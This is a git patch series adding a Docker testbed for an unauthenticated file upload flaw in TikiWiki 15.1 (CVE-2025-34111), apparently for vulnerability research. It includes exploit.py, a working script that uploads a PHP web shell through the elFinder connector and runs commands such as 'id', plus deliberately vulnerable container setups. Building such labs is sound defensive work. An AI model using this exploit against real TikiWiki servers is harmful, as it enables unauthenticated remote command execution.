From 6433c84c77a14f62c587c6dc1d1c0d5d566371a9 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sat, 23 Aug 2025 20:47:54 +0700 Subject: [PATCH 1/9] add tikiwiki testbed --- tikiwiki/Dockerfile | 26 +++++++++++++++ tikiwiki/README.md | 33 +++++++++++++++++++ tikiwiki/docker-compose.yml | 27 +++++++++++++++ tikiwiki/exploit.py | 66 +++++++++++++++++++++++++++++++++++++ 4 files changed, 152 insertions(+) create mode 100644 tikiwiki/Dockerfile create mode 100644 tikiwiki/README.md create mode 100644 tikiwiki/docker-compose.yml create mode 100644 tikiwiki/exploit.py diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile new file mode 100644 index 00000000..57730ad0 --- /dev/null +++ b/tikiwiki/Dockerfile @@ -0,0 +1,26 @@ +FROM tikiwiki/php:5-apache + +# 1. Fix Debian Stretch repo references and disable expiry checks +RUN sed -i \ + -e 's|http://deb.debian.org/debian|http://archive.debian.org/debian|g' \ + -e 's|http://security.debian.org/debian-security|http://archive.debian.org/debian-security|g' \ + -e '/stretch-updates/d' \ + /etc/apt/sources.list \ + && echo 'Acquire::Check-Valid-Until "false";' > /etc/apt/apt.conf.d/99no-check-valid + +# 2. Update apt and install wget + unzip (allow unauthenticated due to deprecated archive) +RUN apt-get update \ + && apt-get install -y --allow-unauthenticated wget unzip \ + && apt-get clean + +# 3. Download and unpack TikiWiki 15.1 from the official Situla branch +WORKDIR /var/www/html +RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \ + && unzip tiki.zip \ + && rm tiki.zip \ + && mv tiki-15.1/* . \ + && mv tiki-15.1/.* . 2>/dev/null || true \ + && rmdir tiki-15.1 + +# 4. Ensure Apache user owns the files +RUN chown -R www-data:www-data /var/www/html diff --git a/tikiwiki/README.md b/tikiwiki/README.md new file mode 100644 index 00000000..8196437c --- /dev/null +++ b/tikiwiki/README.md @@ -0,0 +1,33 @@ +# Unauthenticated File Upload Tikiwiki (CVE-2025-34111) Testbed + +## Setup + +Build and run vulnerable container using docker compose, it will open port 8080 that run tikiwiki. + +1. Run and build tikiwiki docker container + +```bash +docker compose up +``` + +2. Follow the setup wizard for tikiwiki installation + - Click continue until Database Connection + - Fill the input: + - Host name: db + - Database name: tikiwiki + - Database username: tiki + - Database password: wiki + - Database engine: InnoDB + - Continue until "Enter tiki and lock installer" + - Set admin password, then logout + + +## How to Trigger the Vulnerability? + +To trigger this vulnerability manually, just simply by running the `exploit.py` + +```bash +python3 exploit.py +``` + +The response should be contains php webshell (e. g. http://localhost:8080/vendor_extra/elfinder/files/CFRmkPLSTH.php?cmd=whoami) \ No newline at end of file diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml new file mode 100644 index 00000000..c63a4ad8 --- /dev/null +++ b/tikiwiki/docker-compose.yml @@ -0,0 +1,27 @@ +version: '2' + +services: + tiki: + build: . + ports: + - "8080:80" + depends_on: + - db + environment: + TIKI_DB_NAME: tikiwiki + TIKI_DB_USER: tiki + TIKI_DB_PASS: wiki + + db: + image: mysql:5.6 + restart: always + environment: + MYSQL_ROOT_PASSWORD: rootpass + MYSQL_DATABASE: tikiwiki + MYSQL_USER: tiki + MYSQL_PASSWORD: wiki + volumes: + - db_data:/var/lib/mysql + +volumes: + db_data: diff --git a/tikiwiki/exploit.py b/tikiwiki/exploit.py new file mode 100644 index 00000000..acb97835 --- /dev/null +++ b/tikiwiki/exploit.py @@ -0,0 +1,66 @@ +import requests +import random +import string +from urllib.parse import urljoin + +def random_filename(): + return ''.join(random.choices(string.ascii_letters, k=10)) + ".php" + +def check_elfinder(base_url): + test_url = urljoin(base_url, 'vendor_extra/elfinder/elfinder.html') + res = requests.get(test_url) + if res.status_code == 200: + print("[+] ELFinder page is accessible. Target likely vulnerable.") + return True + else: + print("[-] ELFinder page not found. Target may not be vulnerable.") + return False + +def upload_php_payload(base_url, filename, php_code): + upload_url = urljoin(base_url, 'vendor_extra/elfinder/php/connector.minimal.php') + + files = { + 'cmd': (None, 'upload'), + 'target': (None, 'l1_Lw'), # Base64 for "/" + 'upload[]': (filename, php_code, 'application/octet-stream') + } + + print(f"[+] Uploading {filename}...") + res = requests.post(upload_url, files=files) + if res.status_code == 200: + print("[+] Upload appears successful.") + return True + else: + print("[-] Upload failed.") + return False + +def trigger_backdoor(base_url, filename): + shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}') + print(f"[+] Triggering payload at {shell_url}") + res = requests.get(shell_url) + if res.status_code == 200: + print("[+] Payload executed (response below):\n") + print(res.text) + else: + print("[-] Could not trigger the payload.") + +def main(): + # === Prompt for base URL === + base_url = input("Enter TikiWiki base URL (e.g. http://localhost:8080): ").strip() + if not base_url.endswith('/'): + base_url += '/' + + php_payload = "" # Simple web shell + filename = random_filename() + + if not check_elfinder(base_url): + return + + if upload_php_payload(base_url, filename, php_payload): + trigger_backdoor(base_url, filename) + print(f"[!] Try executing a command: {base_url}vendor_extra/elfinder/files/{filename}?cmd=whoami") + else: + print("[-] Exploit failed during upload.") + +if __name__ == "__main__": + main() From 3b82697f6e87dcdc8e76068b8e0b7c5a695386c5 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:21 +0700 Subject: [PATCH 2/9] Update tikiwiki/exploit.py Co-authored-by: Savio Sisco --- tikiwiki/exploit.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tikiwiki/exploit.py b/tikiwiki/exploit.py index acb97835..ba38ea21 100644 --- a/tikiwiki/exploit.py +++ b/tikiwiki/exploit.py @@ -35,8 +35,8 @@ def upload_php_payload(base_url, filename, php_code): return False def trigger_backdoor(base_url, filename): - shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}') - print(f"[+] Triggering payload at {shell_url}") + shell_url = urljoin(base_url, f'vendor_extra/elfinder/files/{filename}?cmd=id') + print(f"[+] Running 'id' at {shell_url}") res = requests.get(shell_url) if res.status_code == 200: print("[+] Payload executed (response below):\n") From 58572013bdad1fcd5339c8c65cfe9b91209eabdf Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:37 +0700 Subject: [PATCH 3/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index 57730ad0..5dfe5d14 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -1,17 +1,5 @@ FROM tikiwiki/php:5-apache -# 1. Fix Debian Stretch repo references and disable expiry checks -RUN sed -i \ - -e 's|http://deb.debian.org/debian|http://archive.debian.org/debian|g' \ - -e 's|http://security.debian.org/debian-security|http://archive.debian.org/debian-security|g' \ - -e '/stretch-updates/d' \ - /etc/apt/sources.list \ - && echo 'Acquire::Check-Valid-Until "false";' > /etc/apt/apt.conf.d/99no-check-valid - -# 2. Update apt and install wget + unzip (allow unauthenticated due to deprecated archive) -RUN apt-get update \ - && apt-get install -y --allow-unauthenticated wget unzip \ - && apt-get clean # 3. Download and unpack TikiWiki 15.1 from the official Situla branch WORKDIR /var/www/html From efd862b8dc3d5b45eadc6391a7411a9dbbd1bba9 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:04:45 +0700 Subject: [PATCH 4/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index 5dfe5d14..ab323689 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -5,10 +5,8 @@ FROM tikiwiki/php:5-apache WORKDIR /var/www/html RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \ && unzip tiki.zip \ - && rm tiki.zip \ && mv tiki-15.1/* . \ - && mv tiki-15.1/.* . 2>/dev/null || true \ - && rmdir tiki-15.1 + && rm -r tiki.zip tiki-15.1 # 4. Ensure Apache user owns the files RUN chown -R www-data:www-data /var/www/html From c53ae2d9bbfebeb329777d8dd5d97e7c8021d842 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:00 +0700 Subject: [PATCH 5/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index ab323689..c9722db1 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -1,9 +1,11 @@ FROM tikiwiki/php:5-apache -# 3. Download and unpack TikiWiki 15.1 from the official Situla branch +USER www-data WORKDIR /var/www/html -RUN wget https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -O tiki.zip \ + +# Download and unpack TikiWiki 15.1 from the official Situla branch +RUN curl -L https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15.1/tiki-15.1.zip/download -o tiki.zip \ && unzip tiki.zip \ && mv tiki-15.1/* . \ && rm -r tiki.zip tiki-15.1 From 5d410b515c37b9e249a6045c67eb38fa1e7400cb Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:08 +0700 Subject: [PATCH 6/9] Update tikiwiki/Dockerfile Co-authored-by: Savio Sisco --- tikiwiki/Dockerfile | 2 -- 1 file changed, 2 deletions(-) diff --git a/tikiwiki/Dockerfile b/tikiwiki/Dockerfile index c9722db1..6f220973 100644 --- a/tikiwiki/Dockerfile +++ b/tikiwiki/Dockerfile @@ -10,5 +10,3 @@ RUN curl -L https://sourceforge.net/projects/tikiwiki/files/Tiki_15.x_Situla/15. && mv tiki-15.1/* . \ && rm -r tiki.zip tiki-15.1 -# 4. Ensure Apache user owns the files -RUN chown -R www-data:www-data /var/www/html From ed0a204798a686d7073e4705d08f6cfddb73688a Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:05:15 +0700 Subject: [PATCH 7/9] Update tikiwiki/docker-compose.yml Co-authored-by: Savio Sisco --- tikiwiki/docker-compose.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml index c63a4ad8..74d77a61 100644 --- a/tikiwiki/docker-compose.yml +++ b/tikiwiki/docker-compose.yml @@ -20,8 +20,3 @@ services: MYSQL_DATABASE: tikiwiki MYSQL_USER: tiki MYSQL_PASSWORD: wiki - volumes: - - db_data:/var/lib/mysql - -volumes: - db_data: From 843be450b326feec1cf1d3e0476558b3394c78ce Mon Sep 17 00:00:00 2001 From: crackatoa Date: Sun, 7 Sep 2025 18:21:03 +0700 Subject: [PATCH 8/9] remove version docker-compose.yml --- tikiwiki/docker-compose.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/docker-compose.yml index 74d77a61..5aad7e06 100644 --- a/tikiwiki/docker-compose.yml +++ b/tikiwiki/docker-compose.yml @@ -1,5 +1,3 @@ -version: '2' - services: tiki: build: . From bff9013ba4eeca10d92c49336749f81a9ce50585 Mon Sep 17 00:00:00 2001 From: crackatoa Date: Fri, 12 Sep 2025 10:01:41 +0700 Subject: [PATCH 9/9] Add non vulnerable version --- tikiwiki/{ => CVE-2025-34111}/Dockerfile | 0 tikiwiki/{ => CVE-2025-34111}/README.md | 8 ++++++++ .../CVE-2025-34111/docker-compose-safe.yml | 19 +++++++++++++++++++ .../{ => CVE-2025-34111}/docker-compose.yml | 0 tikiwiki/{ => CVE-2025-34111}/exploit.py | 0 5 files changed, 27 insertions(+) rename tikiwiki/{ => CVE-2025-34111}/Dockerfile (100%) rename tikiwiki/{ => CVE-2025-34111}/README.md (89%) create mode 100644 tikiwiki/CVE-2025-34111/docker-compose-safe.yml rename tikiwiki/{ => CVE-2025-34111}/docker-compose.yml (100%) rename tikiwiki/{ => CVE-2025-34111}/exploit.py (100%) diff --git a/tikiwiki/Dockerfile b/tikiwiki/CVE-2025-34111/Dockerfile similarity index 100% rename from tikiwiki/Dockerfile rename to tikiwiki/CVE-2025-34111/Dockerfile diff --git a/tikiwiki/README.md b/tikiwiki/CVE-2025-34111/README.md similarity index 89% rename from tikiwiki/README.md rename to tikiwiki/CVE-2025-34111/README.md index 8196437c..b1ffb456 100644 --- a/tikiwiki/README.md +++ b/tikiwiki/CVE-2025-34111/README.md @@ -6,10 +6,18 @@ Build and run vulnerable container using docker compose, it will open port 8080 1. Run and build tikiwiki docker container +Vulnerable version + ```bash docker compose up ``` +Non-vulnerable version + +```bash +docker compose -f docker-compose-safe.yml up +``` + 2. Follow the setup wizard for tikiwiki installation - Click continue until Database Connection - Fill the input: diff --git a/tikiwiki/CVE-2025-34111/docker-compose-safe.yml b/tikiwiki/CVE-2025-34111/docker-compose-safe.yml new file mode 100644 index 00000000..2441bb70 --- /dev/null +++ b/tikiwiki/CVE-2025-34111/docker-compose-safe.yml @@ -0,0 +1,19 @@ +services: + tiki: + image: tikiwiki/tikiwiki:20.x + ports: + - "8080:80" + depends_on: + - db + environment: + - TIKI_DB_USER=tiki + - TIKI_DB_PASS=wiki + - TIKI_DB_NAME=tikiwiki + db: + image: mariadb + environment: + - MYSQL_USER=tiki + - MYSQL_PASSWORD=wiki + - MYSQL_DATABASE=tikiwiki + - MYSQL_ROOT_PASSWORD=tkwkiiii + - TERM=dumb \ No newline at end of file diff --git a/tikiwiki/docker-compose.yml b/tikiwiki/CVE-2025-34111/docker-compose.yml similarity index 100% rename from tikiwiki/docker-compose.yml rename to tikiwiki/CVE-2025-34111/docker-compose.yml diff --git a/tikiwiki/exploit.py b/tikiwiki/CVE-2025-34111/exploit.py similarity index 100% rename from tikiwiki/exploit.py rename to tikiwiki/CVE-2025-34111/exploit.py